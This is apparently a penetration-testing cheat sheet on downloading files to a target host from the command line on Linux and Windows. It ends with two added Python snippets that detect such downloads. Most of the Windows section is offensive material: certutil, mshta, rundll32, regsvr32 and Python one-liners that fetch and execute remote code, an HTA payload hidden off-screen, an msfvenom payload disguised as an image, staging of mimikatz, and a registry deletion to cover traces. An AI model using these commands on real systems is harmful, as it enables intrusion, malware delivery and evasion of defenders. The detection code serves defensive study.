Detailed tutorial on how to download files with command line and terminal (Win + Linux)

1. Introduction

During penetration testing, it is usually necessary to transfer some files to the target host to achieve privilege escalation and maintain control. When direct transfer is inconvenient but the target host has a network connection, the files can be downloaded instead. In this article I summarize most of the download commands used on Windows and Linux; there may be omissions, but these are the ones used most often.

2. Linux

2.1 Wget

This tool is very feature-rich and acts as a sort of full-featured GUI download manager. It has all the features that an ideal download manager needs: it can resume downloads, download multiple files, retry downloads after a connection problem, and even limit the maximum download bandwidth.

Download:

wget http://www.sample-videos.com/video/mp4/big.mp4

Background download:

wget -b http://www.sample-videos.com/video/mp4/big.mp4

To resume the download if the internet connection is interrupted:

wget -c http://www.sample-videos.com/video/mp4/big.mp4

Download a file from a password-protected ftp repository:

wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address

2.2 Curl

Curl is another efficient download tool that can upload or download files with a single simple command. It supports pausing and resuming downloads, supports the largest number of web protocols, can estimate how much download time is left, and shows the download progress with a progress bar. It is a built-in tool of all Linux distributions.

Download:

curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4

With the -o option, provide a name and the downloaded file will be saved with that name; with the -O option, the file will be saved with the original name.

2.3 Axel

This is a great alternative to wget and is a lightweight download utility. It's actually an accelerator, because it opens multiple http connections to download individual file segments, so the file downloads faster.

apt-get install axel

Download:

axel http://www.sample-videos.com/video/mp4/big.mp4

2.4 Aria2

This is an open source command-line download accelerator that supports multiple ports and allows you to use the maximum bandwidth to download files. It is an easy-to-install and easy-to-use tool.

apt-get install aria2

Download:

aria2c http://www.sample-videos.com/video/mp4/big.mp4

2.5 Perl

Perl is an awesome language, you can do almost anything with it, and it's easy to do file downloads with it.

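#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;
# getstore() writes the response body to a local file and returns the HTTP status code
my $status = getstore("http://domain/file", "file");
die "download failed: HTTP $status\n" unless is_success($status);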

Execute the script file like this:

perl test.pl

2.6 Python

Python is also a popular mainstream scripting language with clear and concise code:

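#!/usr/bin/env python3
# Python 3: urllib2 from Python 2 is now urllib.request
import urllib.request

with urllib.request.urlopen('http://domain/file') as u:
    # Binary mode, so non-text files are written unchanged
    with open('local_file', 'wb') as local_file:
        local_file.write(u.read())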

2.7 Ruby

Ruby is an object-oriented language, and the one the Metasploit framework is implemented in. Of course, it can also handle small tasks like downloading files.

#!/usr/bin/ruby
require 'net/http'
# Fetch /file from the server and write the body to disk in binary mode
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  File.open("save_location", "wb") { |file|
    file.write(r.body)
  }
}

Execute the script file like this:

ruby test.rb

2.8 PHP

As a server-side script, PHP can also implement the function of downloading files.

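#!/usr/bin/php
<?php
        // file_get_contents() returns the whole body; file() splits it into lines,
        // so writing $data[0] would save only the first line
        $data = @file_get_contents("http://example.com/file");
        if ($data === false) { exit(1); }
        $lf = "local_file";
        $fh = fopen($lf, 'wb');
        fwrite($fh, $data);
        fclose($fh);
?>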

Execute the script file like this:

php test.php

2.9 FTP

Under normal circumstances, attackers need many interactive steps to upload files using FTP. The following bash script takes that interaction into account and can be executed directly without any interactive prompts.

# -n disables auto-login so the credentials can be supplied from the here-document
ftp -n 127.0.0.1 <<EOF
user username password
get file
bye
EOF

Of course, you can also enter the interactive terminal according to the actual situation:

ftp 192.168.3.2
# After entering the username and password:
lcd E:\file # Enter the file directory under the E drive
cd www # Go to the www directory on the server
get access.log # Download the access.log on the server to E:\file

2.10 Netcat

On the attacker's computer, enter:

cat file | nc -l 1234

This command serves the content of the file on local port 1234; whoever connects to this port receives the content of the file.

Command on the target computer:

nc host_ip 1234 > file

This command connects to the attacker's computer and saves the received file content to a file.

3. Windows

3.1 Powershell

PowerShell is a native scripting language of Windows. For those who are proficient with it, it can implement many complex functions.

The following two commands implement downloading a file from the Internet.

$p = New-Object System.Net.WebClient
# %homepath% is cmd.exe syntax; PowerShell reads environment variables through $env:
$p.DownloadFile("http://domain/file", "$env:USERPROFILE\file")

3.2 IPC$

copy \\192.168.3.1\c$\test.exe E:\file
cmd.exe /k < \\webdavserver\folder\batchfile.txt

3.3 Certutil

Applicable to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
rem Delete the cache entry
certutil -urlcache -split -f http://192.168.3.1/test.exe delete

rem The next command downloads the original file as a temporary bin file; it runs normally after the name is changed back
certutil -verifyctl -split -f -split http://192.168.3.1/test.exe

The file is downloaded and executed as follows:

certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

3.4 Visual Basic

In 1998 the final Visual Basic standard was finalized on Windows. The following code can download a file, although it is much longer than the PowerShell version.

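Set args = Wscript.Arguments
Url = "http://domain/file"
' VBScript does not expand %...% inside string literals, so expand it explicitly
Target = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERPROFILE%\file")
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 ' 1 = adTypeBinary
    .open
    .write xHttp.responseBody
    .savetofile Target, 2 ' 2 = adSaveCreateOverWrite
end with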

On Windows, the cscript command lets you execute VBS script files and change script host settings. On Windows 7 this command is not required, but on Windows XP you need to use it, as follows:

cscript test.vbs

3.5 Tftp

In Windows Vista and later there is FTP by default, which can be run with the following command:

Upload:

tftp -i <IP address> PUT C:\%homepath%\file <remote storage location>

Download:

tftp -i <IP address> GET C:\%homepath%\file <local storage location>

3.6 Bitsadmin

Bitsadmin is a Windows command-line tool that users can use to create download or upload jobs. It can only download to a specified path from the command line, and it requires Windows 7 or above:

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"

bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt

bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt

3.7 msiexec

msiexec /q /i http://192.168.3.1/calc.png

calc.png is generated with:

msfvenom -f msi -p windows/exec CMD=calc.exe > calc.png

3.8 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off

C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe

3.9 Python

C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('http://192.168.3.1/test.zip').read();"

3.10 Mshta

mshta http://192.168.3.1/run.hta

The content of run.hta is as follows:

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" ' Fill in the command here
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML>

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

3.11 Rundll32

Depends on the WScript.shell component:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

3.12 Regsvr32

The Regsvr32 command is used to register COM components. It is a command provided by the Windows system to register controls with the system or uninstall controls. It is run in command line mode.

The regsvr32.exe of WinXP and above systems is in the windows\system32 folder; the regsvr32.exe of the 2000 system is in the winnt\system32 folder.

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll

test.data content:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);

        ]]>
</script>
</registration>
</scriptlet>

You can also use https://github.com/CroweCybersecurity/ps1encode to generate sct files:

regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

3.13 Windows Share

Windows shares can mount a drive and then use commands to copy files.

Mount the remote drive:

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

3.14 Format conversion

When you need to put an exe file on the target computer, Nishang provides PowerShell scripts that convert an exe to hex and then convert the hex back to the original exe file.

To convert the exe to a hex file, enter:

PS > .\ExetoText.ps1 evil.exe evil.txt

Open the evil.txt file, copy its content, and paste it onto the target computer through the RDP clipboard. To restore the hex file to an exe file, enter:

PS > .\TexttoExe.ps1 evil.txt evil.exe

3.15 Others

1. MSXSL.EXE

msxsl.exe is a Microsoft program for processing XSL on the command line, so through it we can execute JavaScript and then execute system commands.

2. pubprn.vbs

On Windows 7+ there exists a Microsoft-signed WSH script named PubPrn.vbs, located at:

C:\Windows\System32\Printing_Admin_Scripts\en-US

3. esentutl.exe/extrac32.exe

esentutl.exe /y "\\172.16.249.149\share\mimikatz_trunk.zip" /d"C:\Users\Public\mimikatz_trunk.zip" /o
extrac32.exe /Y /C \\172.16.249.149\share\test.txt C:\Users\Public\test.txt

4. desktopimgdownldr.exe

desktopimgdownldr.exe is located in the system32 folder of Win10 and was originally used to set the lock screen or desktop background image.

Ordinary users can use:

set "SYSTEMROOT=C:\ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr

This will download the file.

You can change C:\ProgramData to a directory writable by ordinary users.

The downloaded files are stored in:

C:\ProgramData\Personalization\LockScreenImage\x_%random%.exe.
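
Because the tool writes to a fixed sub-path below whatever SYSTEMROOT points to, a defender can check that folder for files that are not images. The following is an added example, not part of the original article; the function names, the image signature list and the demo file names are assumptions of this example.

```python
import os
import tempfile

# Signatures of the image types a lock-screen picture would normally have
# (JPEG, PNG, BMP, GIF); the list is this example's assumption.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"BM", b"GIF8")

def find_non_images(root):
    """Return (path, kind) for files in any Personalization/LockScreenImage
    directory under `root` whose leading bytes are not an image signature."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        parts = os.path.normpath(dirpath).lower().split(os.sep)
        if parts[-2:] != ["personalization", "lockscreenimage"]:
            continue
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(8)
            if not head.startswith(IMAGE_MAGIC):
                kind = "PE executable" if head.startswith(b"MZ") else "not an image"
                findings.append((path, kind))
    return findings

def demo():
    """Build a constructed directory tree and return the base names flagged."""
    with tempfile.TemporaryDirectory() as base:
        target = os.path.join(base, "ProgramData", "Personalization", "LockScreenImage")
        os.makedirs(target)
        samples = {
            "wallpaper.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,  # JPEG header
            "x_12345.exe": b"MZ\x90\x00" + b"\x00" * 16,         # PE header
            "x_67890.png": b"<html>not a png</html>",            # wrong content
        }
        for name, data in samples.items():
            with open(os.path.join(target, name), "wb") as fh:
                fh.write(data)
        return [(os.path.basename(p), k) for p, k in find_non_images(base)]

if __name__ == "__main__":
    for name, kind in demo():
        print(name, "->", kind)
```

Because SYSTEMROOT can be redirected, point `find_non_images` at every user-writable root you want covered, not only C:\ProgramData.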

Admin users will write one more registry entry, so the best command for an admin is:

set "SYSTEMROOT=C:\ProgramData\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f
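
For detection, the download commands in section 3 (certutil, bitsadmin, msiexec, mshta, regsvr32, rundll32, IEExec, desktopimgdownldr and the PowerShell WebClient call) each leave a recognizable process command line. The following is an added example, not code from the original article: the rule names, regular expressions and sample log lines are constructed for illustration, and 192.0.2.10 is a documentation address.

```python
import re

# Rule names and regexes are this example's own, derived from the command
# forms shown in section 3; they are not an official signature set.
RULES = {
    "certutil_download":   r'\bcertutil(?:\.exe)?\s.*[-/](?:urlcache|verifyctl)\b.*https?://',
    "bitsadmin_transfer":  r'\bbitsadmin(?:\.exe)?\s.*/transfer\b.*https?://',
    "msiexec_remote_pkg":  r'\bmsiexec(?:\.exe)?\s.*[-/]i\s*"?https?://',
    "mshta_remote":        r'\bmshta(?:\.exe)?\s+"?(?:https?://|vbscript:|javascript:)',
    "regsvr32_scriptlet":  r'\bregsvr32(?:\.exe)?\s.*/i:"?https?://.*\bscrobj\.dll',
    "rundll32_javascript": r'\brundll32(?:\.exe)?\s+"?javascript:',
    "ieexec_remote":       r'\bieexec(?:\.exe)?\s+"?https?://',
    "desktopimgdownldr":   r'\bdesktopimgdownldr(?:\.exe)?\s.*/lockscreenurl:"?https?://',
    "ps_webclient":        r'\bnet\.webclient\b.*\.downloadfile\s*\(',
}
# Case-insensitive: cmd.exe ignores case in program names and switches.
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def classify(cmdline):
    """Return the sorted names of all rules matching one process command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))

def scan(cmdlines):
    """Return (line_number, rule_names, cmdline) for every line that matches."""
    hits = [(n, classify(line), line) for n, line in enumerate(cmdlines, 1)]
    return [h for h in hits if h[1]]

# Constructed process-creation command lines, benign and suspicious mixed.
SAMPLE = [
    r'certutil -hashfile C:\Temp\setup.iso SHA256',
    r'C:\Windows\System32\certutil.exe -urlcache -split -f http://192.0.2.10/a a.exe',
    r'msiexec /i C:\Installers\app.msi /qn',
    r'msiexec /q /i http://192.0.2.10/calc.png',
    r'regsvr32 /s C:\Windows\System32\scrobj.dll',
    r'regsvr32 /u /s /i:http://192.0.2.10/test.sct scrobj.dll',
    r'bitsadmin /list /allusers',
    r'bitsadmin /rawreturn /transfer getfile http://192.0.2.10/t.txt E:\file\t.txt',
    r'cmd /c desktopimgdownldr.exe /lockscreenurl:http://192.0.2.10/x.exe /eventName:desktopimgdownldr',
    r"powershell -c (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/f','C:\f')",
]

if __name__ == "__main__":
    for n, names, line in scan(SAMPLE):
        print(n, names, line)
```

The benign certutil, msiexec, regsvr32 and bitsadmin lines are not flagged, because the rules require a remote URL in the position where each tool expects its source.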


Tags: Python Linux Windows ftp

Posted by shooka on Sun, 20 Nov 2022 18:22:37 +1030